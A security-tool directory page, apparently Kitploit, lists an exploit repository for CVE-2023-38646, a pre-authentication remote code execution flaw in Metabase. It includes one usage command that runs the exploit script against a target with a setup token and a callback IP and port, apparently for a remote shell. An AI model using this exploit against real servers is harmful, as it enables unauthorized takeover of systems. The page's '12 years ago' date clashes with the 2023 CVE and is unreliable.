Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-38646 — CVE-2023-38646 Pre-Auth RCE in Metabase | Kitploit
Tools/GitHubGitHub/alexandre-pecorilla/cve-2023-38646
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubalexandre-pecorilla/cve-2023-38646

CVE-2023-38646

CVE-2023-38646 Pre-Auth RCE in Metabase

View Repository
12 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-38646

Fork of kh4sh3i's removing the need for Burp Collector.

CVE-2023-38646 (Pre-Auth RCE in Metabase):

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation.

Usage

python3 CVE-2023-38646.py -u http://target.com -t 349fa13d-fd94-4d9b-b54f-b4ebf2df682f -i 10.10.15.101 -p 5555

For more info read this post.

Credits

@fay4breakme

@kh4sh3i

@alex4breakme

Download Tool